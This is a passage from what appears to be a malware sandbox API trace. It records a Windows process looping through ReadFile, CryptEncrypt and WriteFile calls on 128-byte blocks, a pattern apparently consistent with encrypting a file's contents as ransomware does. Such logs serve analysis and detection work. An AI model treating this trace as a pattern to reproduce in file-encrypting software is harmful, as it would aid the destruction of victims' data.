lpOverlapped=0x0) returned 1 [0040.655] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.655] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.655] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.655] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.655] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.655] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.656] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.656] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.656] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.656] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.656] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.656] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.656] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.656] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.657] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.657] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.657] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.657] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.657] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.657] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.657] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.658] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.658] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.658] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.658] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.658] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.658] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.658] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.658] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.659] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.659] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.659] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.659] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.659] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.659] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.659] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.659] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.660] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.660] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.660] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.660] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, 